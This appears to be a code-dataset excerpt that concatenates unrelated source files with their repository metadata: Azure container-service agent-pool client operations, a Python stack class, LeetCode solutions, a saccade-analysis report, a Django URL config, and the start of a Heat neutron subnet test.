Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
        :param parameters: The agent pool to create or update. Is either an AgentPool type or an IO type.
         Required.
:type parameters: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPool or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool in the specified managed cluster.
Deletes an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
@distributed_trace_async
async def get_upgrade_profile(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPoolUpgradeProfile:
"""Gets the upgrade profile for an agent pool.
Gets the upgrade profile for an agent pool.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPoolUpgradeProfile
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPoolUpgradeProfile] = kwargs.pop("cls", None)
request = build_get_upgrade_profile_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_upgrade_profile.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolUpgradeProfile", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default"
}
@distributed_trace_async
async def get_available_agent_pool_versions(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> _models.AgentPoolAvailableVersions:
"""Gets a list of supported Kubernetes versions for the specified agent pool.
See `supported Kubernetes versions
<https://docs.microsoft.com/azure/aks/supported-kubernetes-versions>`_ for more details about
the version lifecycle.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPoolAvailableVersions
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPoolAvailableVersions] = kwargs.pop("cls", None)
request = build_get_available_agent_pool_versions_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_available_agent_pool_versions.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolAvailableVersions", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions"
}
async def _upgrade_node_image_version_initial(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> Optional[_models.AgentPool]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[Optional[_models.AgentPool]] = kwargs.pop("cls", None)
request = build_upgrade_node_image_version_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._upgrade_node_image_version_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 202:
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_upgrade_node_image_version_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"
}
@distributed_trace_async
async def begin_upgrade_node_image_version(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Upgrades the node image version of an agent pool to the latest.
Upgrading the node image version of an agent pool applies the newest OS and runtime updates to
the nodes. AKS provides one new image per week with the latest updates. For more details on
node image versions, see: https://docs.microsoft.com/azure/aks/node-image-upgrade.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
        cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._upgrade_node_image_version_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_upgrade_node_image_version.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"
}
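    # Usage sketch (placeholders in angle brackets must be replaced; assumes
    # valid Azure credentials):
    #   from azure.identity.aio import DefaultAzureCredential
    #   from azure.mgmt.containerservice.v2022_07_01.aio import ContainerServiceClient
    #   client = ContainerServiceClient(DefaultAzureCredential(), "<subscription-id>")
    #   poller = await client.agent_pools.begin_delete("<rg>", "<cluster>", "<pool>")
    #   await poller.result()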
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
527160e77429557933b7824c4d79f4ae526f1411
|
7d949b9f19e4c5c897b3aef76e604f2c0eee7112
|
/src-python/saccade_analysis/tammero_flydradb/report_axis_angle.py
|
88f17a3bd3e549f78714e134fbced84c944473c9
|
[] |
no_license
|
AndreaCensi/saccade_analysis
|
d3fad3a1a406b97c4dcf9cdc82b9b2ce1fbf42df
|
71b87e9225b16317ffa9a581b3c62d8343fe7bfa
|
refs/heads/master
| 2016-09-11T06:49:22.254391
| 2011-12-20T06:39:30
| 2011-12-20T06:39:30
| 952,465
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,889
|
py
|
from contracts import contract
from reprep import Report
import numpy as np
from ..markov import binomial_stats
def create_report_axis_angle(id, desc, saccades):
r = Report('axis_angle')
#
# axis_angle = saccades['axis_angle']
# saccade_angle = saccades['saccade_angle']
stats = statistics_distance_axis_angle(saccades,
num_distance_intervals=10,
axis_angle_bin_interval=10,
axis_angle_bin_size=10
)
f = r.figure(cols=1)
for i, section in enumerate(stats['distance_sections']):
distance_min = section['distance_min']
distance_max = section['distance_max']
prob_left = section['prob_left']
prob_right = section['prob_right']
margin_left = section['margin_left']
margin_right = section['margin_right']
bin_centers = section['bin_centers']
num_saccades = section['num_saccades']
n = len(bin_centers)
with r.data_pylab('section%d' % i) as pylab:
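            # pylab.errorbar expects yerr as a (2, n) array of [lower, upper]
            # offsets, so the asymmetric binomial margins are converted into
            # offsets relative to the point estimates below.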
el = np.zeros((2, n))
el[0, :] = +(margin_left[0, :] - prob_left)
el[1, :] = -(margin_left[1, :] - prob_left)
pylab.errorbar(bin_centers, prob_left, el, None, None,
ecolor='g', label='left', capsize=8, elinewidth=1)
er = np.zeros((2, n))
er[0, :] = +(margin_right[0, :] - prob_right)
er[1, :] = -(margin_right[1, :] - prob_right)
pylab.errorbar(bin_centers, prob_right, er, None, None,
ecolor='r', label='right', capsize=8, elinewidth=1)
pylab.plot(bin_centers, prob_left, 'g-', label='left')
pylab.plot(bin_centers, prob_right, 'r-', label='right')
pylab.xlabel('axis angle (deg)')
pylab.ylabel('probability of turning')
pylab.title('Direction probability for distance in [%dcm,%dcm], %d saccades' %
(distance_min * 100, distance_max * 100, num_saccades))
pylab.plot([0, 0], [0, 1], 'k-')
pylab.axis([-180, 180, 0, 1])
pylab.legend()
r.last().add_to(f)
return r
@contract(x='array[N]', direction='array[N]',
x_bin_centers='array[K]', x_bin_size='>0')
def compute_direction_statistics(x, x_bin_centers, x_bin_size, direction,
alpha=0.01):
K = len(x_bin_centers)
t_prob_left = np.zeros(K)
t_prob_right = np.zeros(K)
t_margin_left = np.zeros((2, K))
t_margin_right = np.zeros((2, K))
for k in range(K):
bin_center = x_bin_centers[k]
inbin = np.logical_and(x <= bin_center + x_bin_size / 2,
bin_center - x_bin_size / 2 <= x)
dirs = direction[inbin]
num = len(dirs)
num_left = (dirs > 0).sum()
num_right = (dirs < 0).sum()
prob_left, prob_right, margin_left, margin_right = \
binomial_stats(num, num_left, num_right, alpha)
t_prob_left[k] = prob_left
t_prob_right[k] = prob_right
t_margin_left[:, k] = margin_left
t_margin_right[:, k] = margin_right
return dict(bin_centers=x_bin_centers,
prob_left=t_prob_left,
prob_right=t_prob_right,
margin_left=t_margin_left,
margin_right=t_margin_right)
def statistics_distance_axis_angle(saccades,
num_distance_intervals,
axis_angle_bin_interval,
axis_angle_bin_size
):
distance = saccades['distance_from_wall']
qs = np.linspace(0, 100, num_distance_intervals)
# distance_edges = np.linspace(0, 1, distance_intervals)
distance_edges = np.percentile(distance, qs.tolist())
distance_num_sections = len(distance_edges) - 1
distance_sections = []
for di in range(distance_num_sections):
distance_min = distance_edges[di]
distance_max = distance_edges[di + 1]
select = np.logical_and(distance > distance_min,
distance < distance_max)
relevant_saccades = saccades[select]
bin_centers = range(-180, 180 + axis_angle_bin_interval,
axis_angle_bin_interval)
statistics = compute_direction_statistics(
x=relevant_saccades['axis_angle'],
x_bin_centers=np.array(bin_centers),
x_bin_size=axis_angle_bin_size,
direction=relevant_saccades['sign'])
statistics['num_saccades'] = len(relevant_saccades)
statistics['distance_min'] = distance_min
statistics['distance_max'] = distance_max
distance_sections.append(statistics)
return dict(distance_edges=distance_edges,
distance_sections=distance_sections)
|
[
"andrea@cds.caltech.edu"
] |
andrea@cds.caltech.edu
|
5b3ad54a4efaa9fbbbe546322a45748b042140c1
|
39b84306510530e39eb9d4087977ddd6b2ee203e
|
/self_assesment/self_assesment2/numericalStack.py
|
9b89874d425cc431c8b4a307eabb5975ea52bfef
|
[
"MIT"
] |
permissive
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
2ff9753a02ce1d2bdb113791d308391df19cc2f6
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
refs/heads/master
| 2022-12-31T02:02:23.566697
| 2020-09-12T06:59:03
| 2020-09-12T06:59:03
| 241,184,510
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
class Stack():
	def __init__(self, val=None):
		# avoid a shared mutable default argument: each Stack gets its own list
		self._value = val if val is not None else []
# print("Stack initialised!")
def push(self, x):
self._value.append(x)
# print ("{} is pushed into stack!!!".format(x))
return self
	def pop(self):
		if len(self._value) > 0:
			# LIFO: drop the most recently pushed element (push appends to the end)
			self._value = self._value[:-1]
			# print ("Values popped")
		else:
			print ("Underflow - List is EMPTY!!!")
		return self
def __len__(self):
val = 0
for i in self._value:
val += 1
return val
def is_Empty(self):
if len(self) == 0:
print ("The list is EMPTY!!!")
return True
else:
# print ("List isn't empty")
return False
def __repr__(self):
string = ""
for i in self._value:
string = string + str(i) + " "
return string
	def top(self):
		# LIFO: the top is the last element pushed
		return self._value[-1]
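# Usage sketch:
#   s = Stack()
#   s.push(1).push(2)  # chaining works because push returns self
#   s.top()            # -> 2 (most recently pushed)
#   s.pop()            # removes 2, leaving [1]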
|
[
"sowmyamanojna@gmail.com"
] |
sowmyamanojna@gmail.com
|
9e66b3c83031a5eb2d06a77c03098a1f9a74c905
|
b332e9e5b63db27b23250ddbbb85b470ceaf92a1
|
/List/largestNumber.py
|
c4a880a23fc70378f9c187caa0e5aedc995c8561
|
[] |
no_license
|
huangketsudou/leetcode_python
|
66fcc695b0a4f94a35cc52e161ae4bfdb1138dc2
|
e983f42d245b69f9bddd9855f51ee59648a2039e
|
refs/heads/master
| 2021-08-07T23:25:45.532458
| 2020-08-23T06:15:22
| 2020-08-23T06:15:22
| 214,324,229
| 2
| 0
| null | 2020-04-12T14:40:47
| 2019-10-11T02:16:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,866
|
py
|
from typing import List
from functools import lru_cache  # required by the memoized Solution below
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [[] for _ in range(target+1)]
for i in range(1, target + 1):
for j, c in enumerate(cost):
if i == c:
dp[i]=self.cmp(dp[i],[j+1]).copy()
elif i > c:
if len(dp[i - c]):
b = dp[i - c].copy()
b.append(j + 1)
dp[i] = self.cmp(dp[i], b).copy()
for i in dp:
print(i)
return ''.join(map(str,dp[-1]))
def cmp(self, a, b):
a.sort(reverse=True)
b.sort(reverse=True)
if len(a) == len(b):
return a if a > b else b
elif len(a) < len(b):
return b
else:
return a
class Solution:
#@SQRPI
def largestNumber(self, cost: List[int], tar: int) -> str:
mi = min(cost)
@lru_cache(None)
        def dp(target):  # the largest value attainable with exactly this target
if target == 0: return 0
if target < mi: return -float('inf')
res = -float('inf')
for x in range(9):
res = max(dp(target - cost[x])*10 + x + 1, res)
return res
res = dp(tar)
return str(res) if res > 0 else "0"
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [-1 for j in range(target + 1)]
dp[0] = 0
for i in range(8, -1, -1):
for j in range(cost[i], target + 1):
if dp[j - cost[i]] < 0:
continue
dp[j] = max(dp[j], dp[j - cost[i]] * 10 + (i + 1))
if dp[target] >= 0:
return str(dp[target])
else:
return '0'
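# In the bottom-up version above, dp[j] holds the largest integer whose
# digits cost exactly j; appending digit (i + 1) via
# dp[j - cost[i]] * 10 + (i + 1) keeps dp[j] maximal, since a longer
# number always compares greater and, at equal length, bigger digits win.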
k = Solution()
print(k.largestNumber([1,1,1,1,1,1,1,1,1], 5000))
|
[
"1941161938@qq.com"
] |
1941161938@qq.com
|
781c73109fd82253400de9f5d6a1a1933c3ea874
|
84297380d00453e71f65c591dca046bd41a32184
|
/ABC/ABC158/B.py
|
908f7549a2b440db2e70bbd04547fea89beaef38
|
[] |
no_license
|
daiki1998/atcoder
|
a5ef25245b1bbc3a5e33044846a3c16213603bd3
|
d864a7cb11e41dbf6a691f5d128fdfe122b07046
|
refs/heads/main
| 2023-03-06T22:55:29.863716
| 2021-02-18T12:01:24
| 2021-02-18T12:01:24
| 323,401,954
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
N, A, B = map(int, input().split())
res, amari = N // (A+B), N % (A+B)
print(res*A + min(amari, A))
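# Each full block of (A + B) answers yields A correct answers; of the
# leftover 'amari' answers at most the first A are correct.
# e.g. N=10, A=2, B=3 -> res=2, amari=0 -> prints 4.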
|
[
"shimokawadaiki@shimokawadaikinoMacBook-Pro.local"
] |
shimokawadaiki@shimokawadaikinoMacBook-Pro.local
|
f02286ccdd2739bd33ad6702398683ffcba4ff5d
|
402f90865d7de0bb7273c8e03de131d19c2e4318
|
/django_fullstack/urls.py
|
fee9fca5f611831511b2f3977956afedb1796883
|
[] |
no_license
|
yavorm-tech/django-fullstack
|
bc83b5687c767304bf6b5904ee207fd269ea4210
|
654c034dd438678faeeedaed30f618ee0ceccebe
|
refs/heads/master
| 2022-11-17T01:14:28.843249
| 2020-06-30T05:47:29
| 2020-06-30T05:47:29
| 275,743,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 906
|
py
|
"""django_fullstack URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path('admin/', admin.site.urls),
path('demo/', include('demo.urls')),
path('auth/', obtain_auth_token)
]
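# Example: obtaining a DRF token from the endpoint wired above (a sketch;
# host, credentials and the returned token are placeholders):
#
#     curl -X POST http://localhost:8000/auth/ -d "username=alice" -d "password=secret"
#     # -> {"token": "9944b09199c62bcf9418ad846dd0e4bbdfc6ee4b"}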
|
[
"="
] |
=
|
9a6e758c8f2fbb8e0949a60809a56b779c857f86
|
35be0509b6f98030ef5338033468710de1a536a3
|
/heat/heat/tests/neutron/test_neutron_subnet.py
|
b7962c3a6e84ffa2a768b1113132dc49cecc7188
|
[
"Apache-2.0"
] |
permissive
|
yizhongyin/OpenstackLiberty
|
6f2f0ff95bfb4204f3dbc74a1c480922dc387878
|
f705e50d88997ef7473c655d99f1e272ef857a82
|
refs/heads/master
| 2020-12-29T02:44:01.555863
| 2017-03-02T06:43:47
| 2017-03-02T06:43:47
| 49,924,385
| 0
| 1
| null | 2020-07-24T00:49:34
| 2016-01-19T03:45:06
|
Python
|
UTF-8
|
Python
| false
| false
| 19,507
|
py
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mox
from neutronclient.common import exceptions as qe
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.v2_0 import client as neutronclient
import six
from heat.common import exception
from heat.common import template_format
from heat.engine.cfn import functions as cfn_funcs
from heat.engine.resources.openstack.neutron import subnet
from heat.engine import rsrc_defn
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
neutron_template = '''
heat_template_version: 2015-04-30
description: Template to test subnet Neutron resource
resources:
net:
type: OS::Neutron::Net
properties:
name: the_net
tenant_id: c1210485b2424d48804aad5d39c61b8f
shared: true
dhcp_agent_ids:
- 28c25a04-3f73-45a7-a2b4-59e183943ddc
sub_net:
type: OS::Neutron::Subnet
properties:
network: { get_resource : net}
tenant_id: c1210485b2424d48804aad5d39c61b8f
ip_version: 4
cidr: 10.0.3.0/24
allocation_pools:
- start: 10.0.3.20
end: 10.0.3.150
host_routes:
- destination: 10.0.4.0/24
nexthop: 10.0.3.20
